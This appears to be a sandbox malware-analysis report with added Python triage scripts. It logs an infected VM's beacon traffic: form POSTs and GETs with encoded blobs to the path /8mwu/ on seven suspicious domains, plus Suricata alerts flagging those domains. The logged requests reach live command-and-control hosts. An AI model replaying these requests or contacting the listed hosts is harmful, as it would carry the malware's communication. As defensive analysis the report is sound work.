Network Analysis
IP Address | Status | Action |
---|---|---|
108.181.20.35 | Active | Moloch |
104.21.73.200 | Active | Moloch |
162.43.104.75 | Active | Moloch |
164.124.101.2 | Active | Moloch |
192.250.196.82 | Active | Moloch |
203.161.55.144 | Active | Moloch |
204.11.56.48 | Active | Moloch |
206.119.167.205 | Active | Moloch |
45.33.6.223 | Active | Moloch |
52.74.11.229 | Active | Moloch |
68.178.150.54 | Active | Moloch |
TCP Requests
Source | Destination | Host |
---|---|---|
108.181.20.35:443 | 192.168.56.101:49596 | (none recorded) |
192.168.56.101:49178 | 104.21.73.200:80 | www.framedeals.buzz |
192.168.56.101:49179 | 104.21.73.200:80 | www.framedeals.buzz |
192.168.56.101:49168 | 162.43.104.75:80 | www.date-store.info |
192.168.56.101:49169 | 162.43.104.75:80 | www.date-store.info |
192.168.56.101:49174 | 192.250.196.82:80 | www.niubiseo158.top |
192.168.56.101:49175 | 192.250.196.82:80 | www.niubiseo158.top |
192.168.56.101:49172 | 203.161.55.144:80 | www.snazzy.top |
192.168.56.101:49173 | 203.161.55.144:80 | www.snazzy.top |
192.168.56.101:49176 | 204.11.56.48:80 | www.homesalerealtywi.com |
192.168.56.101:49177 | 204.11.56.48:80 | www.homesalerealtywi.com |
192.168.56.101:49167 | 45.33.6.223:80 | www.sqlite.org |
192.168.56.101:49165 | 52.74.11.229:80 | www.baotrang-jewelry.com |
192.168.56.101:49166 | 52.74.11.229:80 | www.baotrang-jewelry.com |
192.168.56.101:49170 | 68.178.150.54:80 | www.investmentmastr.com |
192.168.56.101:49171 | 68.178.150.54:80 | www.investmentmastr.com |
UDP Requests
Source | Destination | Service |
---|---|---|
192.168.56.101:52753 | 164.124.101.2:53 | DNS |
192.168.56.101:52797 | 164.124.101.2:53 | DNS |
192.168.56.101:52815 | 164.124.101.2:53 | DNS |
192.168.56.101:53004 | 164.124.101.2:53 | DNS |
192.168.56.101:53850 | 164.124.101.2:53 | DNS |
192.168.56.101:54148 | 164.124.101.2:53 | DNS |
192.168.56.101:54883 | 164.124.101.2:53 | DNS |
192.168.56.101:55146 | 164.124.101.2:53 | DNS |
192.168.56.101:58297 | 164.124.101.2:53 | DNS |
192.168.56.101:59002 | 164.124.101.2:53 | DNS |
192.168.56.101:61950 | 164.124.101.2:53 | DNS |
192.168.56.101:137 | 192.168.56.103:137 | NetBIOS name service |
192.168.56.101:137 | 192.168.56.255:137 | NetBIOS name service (subnet broadcast) |
192.168.56.101:138 | 192.168.56.255:138 | NetBIOS datagram service (subnet broadcast) |
192.168.56.101:53853 | 239.255.255.250:1900 | SSDP (multicast) |
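The flow lines the sandbox emits have the form src:port dst:port, with any resolved hostname glued straight onto the destination port and no separator, and the single 443 connection is listed with the remote side first. The Python below is an added example, not part of the sandbox report: it parses that raw form, normalises direction so the sandbox VM is always the source, and separates the NetBIOS, SSDP and resolver chatter from the external peers the sample actually contacted. The flow lines are transcribed from this page; the sandbox subnet 192.168.56.0/24 is an assumption inferred from the addresses seen.

```python
import ipaddress
import re
from collections import defaultdict

# Flow lines in the raw form the sandbox prints them (constructed from the TCP/UDP
# lists on this page, one line per destination). A resolved hostname, when present,
# is glued directly onto the destination port; the 443 line has the remote side first.
RAW_TCP = """
108.181.20.35:443 192.168.56.101:49596
192.168.56.101:49178 104.21.73.200:80www.framedeals.buzz
192.168.56.101:49168 162.43.104.75:80www.date-store.info
192.168.56.101:49174 192.250.196.82:80www.niubiseo158.top
192.168.56.101:49172 203.161.55.144:80www.snazzy.top
192.168.56.101:49176 204.11.56.48:80www.homesalerealtywi.com
192.168.56.101:49167 45.33.6.223:80www.sqlite.org
192.168.56.101:49165 52.74.11.229:80www.baotrang-jewelry.com
192.168.56.101:49170 68.178.150.54:80www.investmentmastr.com
"""
RAW_UDP = """
192.168.56.101:52753 164.124.101.2:53
192.168.56.101:137 192.168.56.103:137
192.168.56.101:137 192.168.56.255:137
192.168.56.101:138 192.168.56.255:138
192.168.56.101:53853 239.255.255.250:1900
"""

# src:port, whitespace, dst:port, then whatever non-space text follows the port (the hostname).
FLOW_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)(\S*)$")
LAN = ipaddress.ip_network("192.168.56.0/24")  # assumed sandbox subnet
SERVICE = {53: "dns", 80: "http", 137: "netbios-ns", 138: "netbios-dgm", 443: "https", 1900: "ssdp"}


def parse_flow(line, proto):
    """Parse one raw flow line; swap the endpoints when the sandbox printed the remote side first."""
    m = FLOW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable flow line: {line!r}")
    src, sport, dst, dport, host = m.groups()
    if ipaddress.ip_address(src) not in LAN and ipaddress.ip_address(dst) in LAN:
        src, sport, dst, dport = dst, dport, src, sport
    return {"proto": proto, "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "host": host or None}


def classify(flow):
    """Bucket a flow by destination: multicast, subnet broadcast, LAN peer, or external host."""
    dst = ipaddress.ip_address(flow["dst"])
    if dst.is_multicast:
        return "multicast"
    if dst == LAN.broadcast_address:
        return "broadcast"
    if dst in LAN:
        return "lan"
    return "external"


def triage_flows(raw_tcp, raw_udp):
    """Return (external, noise): external maps each remote IP to the hostnames and
    services seen for it; noise lists the local/broadcast/multicast chatter to ignore."""
    flows = [parse_flow(l, "tcp") for l in raw_tcp.splitlines() if l.strip()]
    flows += [parse_flow(l, "udp") for l in raw_udp.splitlines() if l.strip()]
    external = defaultdict(lambda: {"hosts": set(), "services": set()})
    noise = []
    for f in flows:
        service = SERVICE.get(f["dport"], f"{f['proto']}/{f['dport']}")
        kind = classify(f)
        if kind == "external":
            external[f["dst"]]["services"].add(service)
            if f["host"]:
                external[f["dst"]]["hosts"].add(f["host"])
        else:
            noise.append((kind, f["dst"], service))
    return dict(external), noise


if __name__ == "__main__":
    ext, noise = triage_flows(RAW_TCP, RAW_UDP)
    for ip, entry in sorted(ext.items()):
        print(ip, sorted(entry["services"]), sorted(entry["hosts"]))
    for item in noise:
        print("noise:", *item)
```

The resolver at 164.124.101.2 ends up in the external map tagged only with "dns", which is the cue to treat it as infrastructure rather than as a peer the sample chose; the other ten external IPs are the ones worth pivoting on.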
POST http://www.baotrang-jewelry.com/8mwu/ -> 301
Request:
POST /8mwu/ HTTP/1.1
Host: www.baotrang-jewelry.com
Connection: close
Content-Length: 177
Cache-Control: no-cache
Origin: http://www.baotrang-jewelry.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.baotrang-jewelry.com/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 12 Jul 2023 08:37:04 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.baotrang-jewelry.com/8mwu/
GET http://www.baotrang-jewelry.com/8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6 -> 301
Request:
GET /8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.baotrang-jewelry.com
Connection: close
Response:
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 12 Jul 2023 08:37:07 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.baotrang-jewelry.com/8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6
GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3260000.zip -> 200
Request:
GET /2018/sqlite-dll-win32-x86-3260000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 12 Jul 2023 08:37:08 GMT
Last-Modified: Tue, 05 Feb 2019 16:46:41 GMT
Cache-Control: max-age=120
ETag: "m5c59bdf1s747df"
Content-type: application/zip; charset=utf-8
Content-length: 477151
POST http://www.date-store.info/8mwu/ -> 301
Request:
POST /8mwu/ HTTP/1.1
Host: www.date-store.info
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.date-store.info
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.date-store.info/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 12 Jul 2023 08:37:17 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 241
Connection: close
Location: https://www.date-store.info/8mwu/
GET http://www.date-store.info/8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6 -> 301
Request:
GET /8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.date-store.info
Connection: close
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 12 Jul 2023 08:37:20 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 376
Connection: close
Location: https://www.date-store.info/8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6
POST http://www.investmentmastr.com/8mwu/ -> 404
Request:
POST /8mwu/ HTTP/1.1
Host: www.investmentmastr.com
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.investmentmastr.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.investmentmastr.com/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:25 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET http://www.investmentmastr.com/8mwu/?m9izrh97=PsH7VurMFQyD6ju4MnYVKLsngyhRF0i3kpEyk+bvF+v2WbyUoo2xQnfNKDF27FubHa/Uq1yd2iymJaC1K/rhLY6C/0yWRYEJmyt9xCA=&NA=YcFFh3pmG-c-6 -> 404
Request:
GET /8mwu/?m9izrh97=PsH7VurMFQyD6ju4MnYVKLsngyhRF0i3kpEyk+bvF+v2WbyUoo2xQnfNKDF27FubHa/Uq1yd2iymJaC1K/rhLY6C/0yWRYEJmyt9xCA=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.investmentmastr.com
Connection: close
Response:
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:28 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
POST http://www.snazzy.top/8mwu/ -> 404
Request:
POST /8mwu/ HTTP/1.1
Host: www.snazzy.top
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.snazzy.top
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.snazzy.top/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:39 GMT
Server: Apache
Content-Length: 1414
Connection: close
Content-Type: text/html
GET http://www.snazzy.top/8mwu/?m9izrh97=hq4LUNPbOJJ32NO4taYz6MbqZKFszgoxkz2vk6DroaZ2ot5/vFuGkg9TSETWpPkUvR5zvHY4W4/OsVbmF+Jpeu4hTeI286k5D1jdj0E=&NA=YcFFh3pmG-c-6 -> 404
Request:
GET /8mwu/?m9izrh97=hq4LUNPbOJJ32NO4taYz6MbqZKFszgoxkz2vk6DroaZ2ot5/vFuGkg9TSETWpPkUvR5zvHY4W4/OsVbmF+Jpeu4hTeI286k5D1jdj0E=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.snazzy.top
Connection: close
Response:
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:42 GMT
Server: Apache
Content-Length: 1414
Connection: close
Content-Type: text/html; charset=utf-8
POST http://www.niubiseo158.top/8mwu/ -> 200
Request:
POST /8mwu/ HTTP/1.1
Host: www.niubiseo158.top
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.niubiseo158.top
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.niubiseo158.top/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 08:37:48 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
GET http://www.niubiseo158.top/8mwu/?m9izrh97=DpBsY/EqeNdrZFzJBhJgkE6I4JhtuhKG/ihhRdK7+ZddsX/RTtTF+8Mul1ZbonjYts59d9bhAh3cEH3KC86wGfwsRy2myXMRgqa2uDs=&NA=YcFFh3pmG-c-6 -> 200
Request:
GET /8mwu/?m9izrh97=DpBsY/EqeNdrZFzJBhJgkE6I4JhtuhKG/ihhRdK7+ZddsX/RTtTF+8Mul1ZbonjYts59d9bhAh3cEH3KC86wGfwsRy2myXMRgqa2uDs=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.niubiseo158.top
Connection: close
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 08:37:50 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
POST http://www.homesalerealtywi.com/8mwu/ -> no response recorded (the sandbox logged status 0 and captured no reply headers)
Request:
POST /8mwu/ HTTP/1.1
Host: www.homesalerealtywi.com
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.homesalerealtywi.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.homesalerealtywi.com/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET http://www.homesalerealtywi.com/8mwu/?m9izrh97=oINJ/gp/aJeJF1lmtDttIp5zYupEQ9+i41jy+2inlUmQPi8yQegxtF+73D7Viv9VJKhdmECNx8qtF80OZhRsVw7SvxMGhJ4ooOkNn5A=&NA=YcFFh3pmG-c-6 -> 200
Request:
GET /8mwu/?m9izrh97=oINJ/gp/aJeJF1lmtDttIp5zYupEQ9+i41jy+2inlUmQPi8yQegxtF+73D7Viv9VJKhdmECNx8qtF80OZhRsVw7SvxMGhJ4ooOkNn5A=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.homesalerealtywi.com
Connection: close
Response:
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2023 08:37:59 GMT
Server: Apache
Set-Cookie: vsid=932vr436696679052749070; expires=Mon, 10-Jul-2028 08:37:59 GMT; Max-Age=157680000; path=/; domain=www.homesalerealtywi.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_SP5pzzsqfGMkxxt0vujZe/TaEyhdrAv3PcfQmNYn1QM5iiobcfuxXtgyROrB+pAclOVwqatUofhH9/wWcd8iPQ==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
POST http://www.framedeals.buzz/8mwu/ -> 404
Request:
POST /8mwu/ HTTP/1.1
Host: www.framedeals.buzz
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.framedeals.buzz
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.framedeals.buzz/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:38:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IQ4gXrOp6g6hbYsUXp2eoYMZGf2ZeEaJj6HfIuBO0HoLfSEjVcxfS9RpdHqV4j6MaznwbpaMzIiW8vGlLdcej70B3gkV%2Fl5z5ZEP5C4S5c8jdchIa0WBuLwVUf4oI99egz6uf%2Bv9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e57f7c8fd21833b-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET http://www.framedeals.buzz/8mwu/?m9izrh97=VWM5CmNEXV0Wws5lOi41B/CT5DkRJBR63DKPnwmZQhPPNIeL3HbUg+RwDwZOLCkdO7WSUUICcQ5s3r8q/6yBYhvdm+7LZZAalqtbZFE=&NA=YcFFh3pmG-c-6 -> 404
Request:
GET /8mwu/?m9izrh97=VWM5CmNEXV0Wws5lOi41B/CT5DkRJBR63DKPnwmZQhPPNIeL3HbUg+RwDwZOLCkdO7WSUUICcQ5s3r8q/6yBYhvdm+7LZZAalqtbZFE=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.framedeals.buzz
Connection: close
Response:
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:38:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GByKZ2ey1jLTDj7pLJGpMIczPmTNVBgT7kp%2FP8qGxR%2Bel6eu7C3yANyGZifgt2alpf8Yr4KWJAqG8gSjO8NCViMe3n0%2FySHiGQ1%2BTgcPLFBzvPQsTbXjf1gJSm6p7g2RKf%2BB8rWT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e57f7d8ccf21a0c-KIX
alt-svc: h3=":443"; ma=86400
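Across the exchanges above, seven unrelated domains are all asked for the same path /8mwu/: each gets a form-encoded POST (Content-Length 177 or 189) and then a GET carrying an opaque base64-style blob in m9izrh97 plus the fixed value NA=YcFFh3pmG-c-6, every one with the same iPad Safari User-Agent, and only www.niubiseo158.top and www.homesalerealtywi.com answered 200. The sqlite.org download uses a different, IE-style User-Agent and does not follow the pattern. The Python below is an added example, not part of the sandbox report, that encodes that triage: it finds URL paths shared by several hosts, checks each host for the POST-then-GET-with-blob pairing, and labels the host live or dead from the recorded statuses. The exchange list is transcribed from this page; the thresholds (three hosts sharing a path, a 40-character blob) are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# (method, url, status) for each exchange in the report, transcribed from this page.
# Status 0 marks the POST for which the sandbox recorded no response.
EXCHANGES = [
    ("POST", "http://www.baotrang-jewelry.com/8mwu/", 301),
    ("GET", "http://www.baotrang-jewelry.com/8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6", 301),
    ("GET", "http://www.sqlite.org/2018/sqlite-dll-win32-x86-3260000.zip", 200),
    ("POST", "http://www.date-store.info/8mwu/", 301),
    ("GET", "http://www.date-store.info/8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6", 301),
    ("POST", "http://www.investmentmastr.com/8mwu/", 404),
    ("GET", "http://www.investmentmastr.com/8mwu/?m9izrh97=PsH7VurMFQyD6ju4MnYVKLsngyhRF0i3kpEyk+bvF+v2WbyUoo2xQnfNKDF27FubHa/Uq1yd2iymJaC1K/rhLY6C/0yWRYEJmyt9xCA=&NA=YcFFh3pmG-c-6", 404),
    ("POST", "http://www.snazzy.top/8mwu/", 404),
    ("GET", "http://www.snazzy.top/8mwu/?m9izrh97=hq4LUNPbOJJ32NO4taYz6MbqZKFszgoxkz2vk6DroaZ2ot5/vFuGkg9TSETWpPkUvR5zvHY4W4/OsVbmF+Jpeu4hTeI286k5D1jdj0E=&NA=YcFFh3pmG-c-6", 404),
    ("POST", "http://www.niubiseo158.top/8mwu/", 200),
    ("GET", "http://www.niubiseo158.top/8mwu/?m9izrh97=DpBsY/EqeNdrZFzJBhJgkE6I4JhtuhKG/ihhRdK7+ZddsX/RTtTF+8Mul1ZbonjYts59d9bhAh3cEH3KC86wGfwsRy2myXMRgqa2uDs=&NA=YcFFh3pmG-c-6", 200),
    ("POST", "http://www.homesalerealtywi.com/8mwu/", 0),
    ("GET", "http://www.homesalerealtywi.com/8mwu/?m9izrh97=oINJ/gp/aJeJF1lmtDttIp5zYupEQ9+i41jy+2inlUmQPi8yQegxtF+73D7Viv9VJKhdmECNx8qtF80OZhRsVw7SvxMGhJ4ooOkNn5A=&NA=YcFFh3pmG-c-6", 200),
    ("POST", "http://www.framedeals.buzz/8mwu/", 404),
    ("GET", "http://www.framedeals.buzz/8mwu/?m9izrh97=VWM5CmNEXV0Wws5lOi41B/CT5DkRJBR63DKPnwmZQhPPNIeL3HbUg+RwDwZOLCkdO7WSUUICcQ5s3r8q/6yBYhvdm+7LZZAalqtbZFE=&NA=YcFFh3pmG-c-6", 404),
]

# Opaque base64-style value: a long run of base64 characters with optional padding.
# The 40-character floor is an assumed threshold, not something taken from the report.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def split_query(query):
    """Split a query string without percent-decoding, so '+' and '/' inside
    base64-style values survive (urllib.parse.parse_qsl would turn '+' into ' ')."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def hosts_sharing_path(exchanges):
    """Map every non-root URL path to the set of hosts it was requested from."""
    by_path = defaultdict(set)
    for _, url, _ in exchanges:
        u = urlsplit(url)
        if u.path not in ("", "/"):
            by_path[u.path].add(u.hostname)
    return by_path


def beacon_profile(exchanges, min_hosts=3):
    """For each host contacted on a path shared by at least min_hosts hosts, note whether
    it saw a POST, a GET whose query carries a blob value, and which statuses came back."""
    shared = {p for p, hs in hosts_sharing_path(exchanges).items() if len(hs) >= min_hosts}
    profile = {}
    for method, url, status in exchanges:
        u = urlsplit(url)
        if u.path not in shared:
            continue
        p = profile.setdefault(u.hostname, {"path": u.path, "post": False,
                                            "get_blob": False, "statuses": []})
        p["statuses"].append(status)
        if method == "POST":
            p["post"] = True
        elif method == "GET" and any(BLOB_RE.fullmatch(v) for _, v in split_query(u.query)):
            p["get_blob"] = True
    return profile


def triage(exchanges, min_hosts=3):
    """Label each host: 'live' if the POST + GET(blob) pair got a 200 back, 'dead' if it
    only saw redirects, 404s or no answer, 'partial' if half the pair is missing, and
    'not-beacon' for hosts outside any shared path (here the sqlite.org download)."""
    profile = beacon_profile(exchanges, min_hosts)
    verdicts = {}
    for _, url, _ in exchanges:
        host = urlsplit(url).hostname
        p = profile.get(host)
        if p is None:
            verdicts[host] = "not-beacon"
        elif p["post"] and p["get_blob"]:
            verdicts[host] = "live" if 200 in p["statuses"] else "dead"
        else:
            verdicts[host] = "partial"
    return verdicts


if __name__ == "__main__":
    for host, verdict in sorted(triage(EXCHANGES).items()):
        print(f"{verdict:10s} {host}")
```

The 301 redirects to https:// and the 404s mean those six hosts are not serving the path over plain HTTP at capture time; the two hosts that returned 200 are the ones to examine for a second-stage response body, which the sandbox did not record here.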
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:54883 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
UDP 192.168.56.101:52753 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
TCP 192.168.56.101:49178 -> 104.21.73.200:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 192.168.56.101:49174 -> 192.250.196.82:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
TCP 192.168.56.101:49175 -> 192.250.196.82:80 | 2031089 | ET HUNTING Request to .TOP Domain with Minimal Headers | Potentially Bad Traffic |
TCP 192.168.56.101:49179 -> 104.21.73.200:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 192.168.56.101:49173 -> 203.161.55.144:80 | 2031089 | ET HUNTING Request to .TOP Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts